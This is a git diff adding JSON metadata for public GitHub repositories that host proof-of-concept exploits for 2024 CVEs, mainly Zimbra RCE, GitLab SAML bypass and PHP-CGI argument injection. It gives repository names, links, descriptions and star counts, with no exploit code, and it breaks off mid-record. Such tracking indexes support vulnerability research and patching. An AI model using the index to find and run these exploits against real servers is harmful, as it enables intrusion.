3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45409.json b/2024/CVE-2024-45409.json new file mode 100644 index 0000000000..b358867c4e --- /dev/null +++ b/2024/CVE-2024-45409.json @@ -0,0 +1,33 @@ +[ + { + "id": 868840911, + "name": "CVE-2024-45409", + "full_name": "synacktiv\/CVE-2024-45409", + "owner": { + "login": "synacktiv", + "id": 50145679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50145679?v=4", + "html_url": "https:\/\/github.com\/synacktiv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/synacktiv\/CVE-2024-45409", + "description": "Ruby-SAML \/ GitLab Authentication Bypass (CVE-2024-45409) exploit", + "fork": false, + "created_at": "2024-10-07T09:24:46Z", + "updated_at": "2024-11-27T12:56:27Z", + "pushed_at": "2024-10-07T11:50:17Z", + "stargazers_count": 74, + "watchers_count": 74, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 74, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45410.json b/2024/CVE-2024-45410.json new file mode 100644 index 0000000000..dd7d70d977 --- /dev/null +++ b/2024/CVE-2024-45410.json @@ -0,0 +1,33 @@ +[ + { + "id": 863444819, + "name": "traefik-CVE-2024-45410-poc", + "full_name": "jphetphoumy\/traefik-CVE-2024-45410-poc", + "owner": { + "login": "jphetphoumy", + "id": 10437801, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10437801?v=4", + "html_url": "https:\/\/github.com\/jphetphoumy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jphetphoumy\/traefik-CVE-2024-45410-poc", + "description": "A proof of concept of traefik CVE to understand the impact", + "fork": false, + "created_at": "2024-09-26T09:58:27Z", + "updated_at": "2024-09-26T21:26:32Z", + "pushed_at": "2024-09-26T13:45:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45436.json b/2024/CVE-2024-45436.json new file mode 100644 index 0000000000..32e3427dc0 --- /dev/null +++ b/2024/CVE-2024-45436.json @@ -0,0 +1,69 @@ +[ + { + "id": 875929293, + "name": "CVE-2024-45436", + "full_name": "pankass\/CVE-2024-45436", + "owner": { + "login": "pankass", + "id": 87853664, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87853664?v=4", + "html_url": "https:\/\/github.com\/pankass", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pankass\/CVE-2024-45436", + "description": "CVE-2024-45436", + "fork": false, + "created_at": "2024-10-21T05:44:49Z", + "updated_at": "2024-10-23T02:33:48Z", + "pushed_at": "2024-10-21T05:47:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891956571, + "name": "cve-2024-45436-exp", + "full_name": "XiaomingX\/cve-2024-45436-exp", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-45436-exp", + "description": "This repository contains an exploit demonstration for CVE-2024-45436, a critical vulnerability affecting specific software versions. It highlights the exploitation mechanism and provides insights for security researchers to understand and mitigate the risk. ", + "fork": false, + "created_at": "2024-11-21T09:03:21Z", + "updated_at": "2024-11-22T09:52:29Z", + "pushed_at": "2024-11-21T09:08:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exp", + "ollama", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45492.json b/2024/CVE-2024-45492.json new file mode 100644 index 0000000000..1b8715a4f8 --- /dev/null +++ b/2024/CVE-2024-45492.json @@ -0,0 +1,33 @@ +[ + { + "id": 881829960, + "name": "external_expat_2.6.2_CVE-2024-45492", + "full_name": "nidhihcl75\/external_expat_2.6.2_CVE-2024-45492", + "owner": { + "login": "nidhihcl75", + "id": 176363052, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176363052?v=4", + "html_url": "https:\/\/github.com\/nidhihcl75", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nidhihcl75\/external_expat_2.6.2_CVE-2024-45492", + "description": null, + "fork": false, + "created_at": "2024-11-01T10:27:39Z", + "updated_at": "2024-11-01T13:59:38Z", + "pushed_at": "2024-11-01T11:23:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45507.json b/2024/CVE-2024-45507.json new file mode 100644 index 0000000000..880d202331 --- /dev/null +++ b/2024/CVE-2024-45507.json @@ -0,0 +1,33 @@ +[ + { + "id": 855621072, + "name": "CVE-2024-45507_Behinder_Webshell", + "full_name": "Avento\/CVE-2024-45507_Behinder_Webshell", + "owner": { + "login": "Avento", + "id": 13798539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13798539?v=4", + "html_url": "https:\/\/github.com\/Avento", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Avento\/CVE-2024-45507_Behinder_Webshell", + "description": null, + "fork": false, + "created_at": "2024-09-11T07:14:13Z", + "updated_at": "2024-09-12T01:46:38Z", + "pushed_at": "2024-09-12T01:46:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45519.json b/2024/CVE-2024-45519.json new file mode 100644 index 0000000000..eecf3d1af6 --- /dev/null +++ b/2024/CVE-2024-45519.json @@ -0,0 +1,131 @@ +[ + { + "id": 864444203, + "name": "CVE-2024-45519", + "full_name": "p33d\/CVE-2024-45519", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/CVE-2024-45519", + "description": null, + "fork": false, + "created_at": "2024-09-28T08:29:06Z", + "updated_at": "2024-11-05T02:40:56Z", + "pushed_at": "2024-09-28T08:34:05Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 41, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 867894040, + "name": "CVE-2024-45519", + "full_name": "Chocapikk\/CVE-2024-45519", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-45519", + "description": "Zimbra - Remote Command Execution (CVE-2024-45519)", + "fork": false, + "created_at": "2024-10-05T00:15:18Z", + "updated_at": "2024-11-21T15:48:59Z", + "pushed_at": "2024-11-05T10:10:40Z", + "stargazers_count": 113, + "watchers_count": 113, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 113, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 886592882, + "name": "CVE-2024-45519", + "full_name": "whiterose7777\/CVE-2024-45519", + "owner": { + "login": "whiterose7777", + "id": 174041119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174041119?v=4", + "html_url": "https:\/\/github.com\/whiterose7777", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whiterose7777\/CVE-2024-45519", + "description": null, + "fork": false, + "created_at": "2024-11-11T08:57:44Z", + "updated_at": "2024-11-12T08:52:37Z", + "pushed_at": "2024-11-11T08:58:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892376259, + "name": "cve-2024-45519-poc", + "full_name": "XiaomingX\/cve-2024-45519-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-45519-poc", + "description": "CVE-2024-45519是Zimbra Collaboration(ZCS)中的一个高危漏洞,存在于其postjournal服务中。当该服务被启用时,未经身份验证的攻击者可以通过构造特定的SMTP请求,远程执行任意命令,从而完全控制受影响的服务器。", + "fork": false, + "created_at": "2024-11-22T01:56:21Z", + "updated_at": "2024-11-22T09:01:44Z", + "pushed_at": "2024-11-22T02:00:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exp", + "poc", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45589.json b/2024/CVE-2024-45589.json new file mode 100644 index 0000000000..729a9e263b --- /dev/null +++ b/2024/CVE-2024-45589.json @@ -0,0 +1,33 @@ +[ + { + "id": 852000766, + "name": "CVE-2024-45589", + "full_name": "BenRogozinski\/CVE-2024-45589", + "owner": { + "login": "BenRogozinski", + "id": 95942910, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95942910?v=4", + "html_url": "https:\/\/github.com\/BenRogozinski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BenRogozinski\/CVE-2024-45589", + "description": null, + "fork": false, + "created_at": "2024-09-04T03:45:33Z", + "updated_at": "2024-09-05T15:52:12Z", + "pushed_at": "2024-09-05T15:52:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45614.json b/2024/CVE-2024-45614.json new file mode 100644 index 0000000000..4ebff692c4 --- /dev/null +++ b/2024/CVE-2024-45614.json @@ -0,0 +1,33 @@ +[ + { + "id": 864410545, + "name": "puma_header_normalization-CVE-2024-45614", + "full_name": "ooooooo-q\/puma_header_normalization-CVE-2024-45614", + "owner": { + "login": "ooooooo-q", + "id": 395584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/395584?v=4", + "html_url": "https:\/\/github.com\/ooooooo-q", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ooooooo-q\/puma_header_normalization-CVE-2024-45614", + "description": "Puma Header normalization CVE-2024-45614 確認", + "fork": false, + "created_at": "2024-09-28T06:29:00Z", + "updated_at": "2024-10-01T13:30:41Z", + "pushed_at": "2024-10-01T13:30:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4577.json b/2024/CVE-2024-4577.json new file mode 100644 index 0000000000..aac4e0576c --- /dev/null +++ b/2024/CVE-2024-4577.json @@ -0,0 +1,1706 @@ +[ + { + "id": 811695573, + "name": "CVE-2024-4577", + "full_name": "TAM-K592\/CVE-2024-4577", + "owner": { + "login": "TAM-K592", + "id": 8276702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8276702?v=4", + "html_url": "https:\/\/github.com\/TAM-K592", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAM-K592\/CVE-2024-4577", + "description": "CVE-2024-4577 is a critical vulnerability in PHP affecting CGI configurations, allowing attackers to execute arbitrary commands via crafted URL parameters.", + "fork": false, + "created_at": "2024-06-07T05:50:23Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-06-11T04:46:42Z", + "stargazers_count": 78, + "watchers_count": 78, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 78, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 811783487, + "name": "CVE-2024-4577", + "full_name": "ohhhh693\/CVE-2024-4577", + "owner": { + "login": "ohhhh693", + "id": 41501723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41501723?v=4", + "html_url": "https:\/\/github.com\/ohhhh693", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohhhh693\/CVE-2024-4577", + "description": "CVE-2024-4577", + "fork": false, + "created_at": "2024-06-07T09:42:31Z", + "updated_at": "2024-06-07T10:30:02Z", + "pushed_at": "2024-06-07T10:29:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811783553, + "name": "CVE-2024-4577", + "full_name": "Junp0\/CVE-2024-4577", + "owner": { + "login": "Junp0", + "id": 69783084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69783084?v=4", + "html_url": "https:\/\/github.com\/Junp0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Junp0\/CVE-2024-4577", + "description": "PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC", + "fork": false, + "created_at": "2024-06-07T09:42:40Z", + "updated_at": "2024-06-16T15:27:28Z", + "pushed_at": "2024-06-07T09:40:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 811785816, + "name": "CVE-2024-4577", + "full_name": "princew88\/CVE-2024-4577", + "owner": { + "login": "princew88", + "id": 165123229, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165123229?v=4", + "html_url": "https:\/\/github.com\/princew88", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/princew88\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-06-07T09:48:36Z", + "updated_at": "2024-06-07T09:48:40Z", + "pushed_at": "2024-06-07T09:48:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811786940, + "name": "CVE-2024-4577", + "full_name": "11whoami99\/CVE-2024-4577", + "owner": { + "login": "11whoami99", + "id": 122907550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122907550?v=4", + "html_url": "https:\/\/github.com\/11whoami99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/11whoami99\/CVE-2024-4577", + "description": "POC & $BASH script for CVE-2024-4577", + "fork": false, + "created_at": "2024-06-07T09:51:39Z", + "updated_at": "2024-11-02T22:24:04Z", + "pushed_at": "2024-06-09T16:16:30Z", + "stargazers_count": 42, + "watchers_count": 42, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 42, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811787428, + "name": "CVE-2024-4577", + "full_name": "watchtowrlabs\/CVE-2024-4577", + "owner": { + "login": "watchtowrlabs", + "id": 99977116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4", + "html_url": "https:\/\/github.com\/watchtowrlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchtowrlabs\/CVE-2024-4577", + "description": "PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC", + "fork": false, + "created_at": "2024-06-07T09:52:54Z", + "updated_at": "2024-11-23T22:12:19Z", + "pushed_at": "2024-06-22T15:13:52Z", + "stargazers_count": 235, + "watchers_count": 235, + "has_discussions": false, + "forks_count": 52, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 52, + "watchers": 235, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 811787647, + "name": "CVE-2024-4577", + "full_name": "zjhzjhhh\/CVE-2024-4577", + "owner": { + "login": "zjhzjhhh", + "id": 64487620, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64487620?v=4", + "html_url": "https:\/\/github.com\/zjhzjhhh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zjhzjhhh\/CVE-2024-4577", + "description": "CVE-2024-4577", + "fork": false, + "created_at": "2024-06-07T09:53:32Z", + "updated_at": "2024-06-07T09:53:32Z", + "pushed_at": "2024-06-07T09:53:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811805923, + "name": "CVE-2024-4577-Nuclei-Template", + "full_name": "huseyinstif\/CVE-2024-4577-Nuclei-Template", + "owner": { + "login": "huseyinstif", + "id": 54823077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54823077?v=4", + "html_url": "https:\/\/github.com\/huseyinstif", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huseyinstif\/CVE-2024-4577-Nuclei-Template", + "description": null, + "fork": false, + "created_at": "2024-06-07T10:40:37Z", + "updated_at": "2024-10-13T17:01:09Z", + "pushed_at": "2024-06-24T11:54:58Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811813168, + "name": "CVE-2024-4577", + "full_name": "taida957789\/CVE-2024-4577", + "owner": { + "login": "taida957789", + "id": 3710930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3710930?v=4", + "html_url": "https:\/\/github.com\/taida957789", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/taida957789\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-06-07T10:58:57Z", + "updated_at": "2024-06-17T19:38:41Z", + "pushed_at": "2024-06-07T11:05:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811856232, + "name": "CVE-2024-4577", + "full_name": "Wh02m1\/CVE-2024-4577", + "owner": { + "login": "Wh02m1", + "id": 21974999, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21974999?v=4", + "html_url": "https:\/\/github.com\/Wh02m1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wh02m1\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-06-07T12:49:20Z", + "updated_at": "2024-06-09T12:50:40Z", + "pushed_at": "2024-06-07T14:29:09Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811966277, + "name": "CVE-2024-4577", + "full_name": "Sysc4ll3r\/CVE-2024-4577", + "owner": { + "login": "Sysc4ll3r", + "id": 158176899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158176899?v=4", + "html_url": "https:\/\/github.com\/Sysc4ll3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sysc4ll3r\/CVE-2024-4577", + "description": "Nuclei Template for CVE-2024-4577", + "fork": false, + "created_at": "2024-06-07T17:01:20Z", + "updated_at": "2024-06-07T18:41:20Z", + "pushed_at": "2024-06-07T18:41:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811966807, + "name": "CVE-2024-4577-RCE-EXP", + "full_name": "WanLiChangChengWanLiChang\/CVE-2024-4577-RCE-EXP", + "owner": { + "login": "WanLiChangChengWanLiChang", + "id": 171075497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171075497?v=4", + "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang\/CVE-2024-4577-RCE-EXP", + "description": null, + "fork": false, + "created_at": "2024-06-07T17:02:52Z", + "updated_at": "2024-07-01T17:20:27Z", + "pushed_at": "2024-06-07T17:26:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812032307, + "name": "CVE-2024-4577", + "full_name": "BitMEXResearch\/CVE-2024-4577", + "owner": { + "login": "BitMEXResearch", + "id": 26349077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26349077?v=4", + "html_url": "https:\/\/github.com\/BitMEXResearch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BitMEXResearch\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-06-07T20:10:49Z", + "updated_at": "2024-06-07T20:35:09Z", + "pushed_at": "2024-06-07T20:35:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812126791, + "name": "CVE-2024-4577-nuclei", + "full_name": "0x20c\/CVE-2024-4577-nuclei", + "owner": { + "login": "0x20c", + "id": 25526653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25526653?v=4", + "html_url": "https:\/\/github.com\/0x20c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x20c\/CVE-2024-4577-nuclei", + "description": "CVE-2024-4577 nuclei-templates", + "fork": false, + "created_at": "2024-06-08T03:12:28Z", + "updated_at": "2024-06-10T02:18:29Z", + "pushed_at": "2024-06-08T04:14:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812155900, + "name": "CVE-2024-4577", + "full_name": "manuelinfosec\/CVE-2024-4577", + "owner": { + "login": "manuelinfosec", + "id": 47338716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47338716?v=4", + "html_url": "https:\/\/github.com\/manuelinfosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/manuelinfosec\/CVE-2024-4577", + "description": "Proof Of Concept RCE exploit for critical vulnerability in PHP <8.2.15 (Windows), allowing attackers to execute arbitrary commands.", + "fork": false, + "created_at": "2024-06-08T05:27:44Z", + "updated_at": "2024-09-05T09:07:04Z", + "pushed_at": "2024-06-08T05:50:27Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812174425, + "name": "CVE-2024-4577", + "full_name": "zomasec\/CVE-2024-4577", + "owner": { + "login": "zomasec", + "id": 118324667, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118324667?v=4", + "html_url": "https:\/\/github.com\/zomasec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zomasec\/CVE-2024-4577", + "description": "CVE-2024-4577 Exploit POC ", + "fork": false, + "created_at": "2024-06-08T06:36:14Z", + "updated_at": "2024-07-08T11:32:59Z", + "pushed_at": "2024-06-09T16:47:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812271703, + "name": "CVE-2024-4577-PHP-RCE", + "full_name": "ZephrFish\/CVE-2024-4577-PHP-RCE", + "owner": { + "login": "ZephrFish", + "id": 5783068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4", + "html_url": "https:\/\/github.com\/ZephrFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2024-4577-PHP-RCE", + "description": "PHP RCE PoC for CVE-2024-4577 written in bash, go, python and a nuclei template", + "fork": false, + "created_at": "2024-06-08T12:23:35Z", + "updated_at": "2024-11-16T19:51:48Z", + "pushed_at": "2024-06-19T16:19:57Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-4577", + "pentest", + "php", + "poc", + "rce-exploit", + "redteam" + ], + "visibility": "public", + "forks": 9, + "watchers": 24, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812283983, + "name": "CVE-2024-4577-PHP-RCE", + "full_name": "xcanwin\/CVE-2024-4577-PHP-RCE", + "owner": { + "login": "xcanwin", + "id": 14187349, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14187349?v=4", + "html_url": "https:\/\/github.com\/xcanwin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xcanwin\/CVE-2024-4577-PHP-RCE", + "description": "[漏洞复现] 全球首款利用PHP默认环境(XAMPP)的CVE-2024-4577 PHP-CGI RCE 漏洞 EXP。", + "fork": false, + "created_at": "2024-06-08T13:04:45Z", + "updated_at": "2024-11-20T16:30:49Z", + "pushed_at": "2024-07-21T20:27:03Z", + "stargazers_count": 120, + "watchers_count": 120, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 120, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812648512, + "name": "CVE-2024-4577", + "full_name": "dbyMelina\/CVE-2024-4577", + "owner": { + "login": "dbyMelina", + "id": 93864453, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93864453?v=4", + "html_url": "https:\/\/github.com\/dbyMelina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dbyMelina\/CVE-2024-4577", + "description": "python poc编写练手,可以对单个目标或批量检测", + "fork": false, + "created_at": "2024-06-09T13:46:46Z", + "updated_at": "2024-06-09T13:48:02Z", + "pushed_at": "2024-06-09T13:47:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812658588, + "name": "CVE-2024-4577", + "full_name": "Chocapikk\/CVE-2024-4577", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-4577", + "description": "PHP CGI Argument Injection vulnerability", + "fork": false, + "created_at": "2024-06-09T14:18:21Z", + "updated_at": "2024-11-06T06:56:51Z", + "pushed_at": 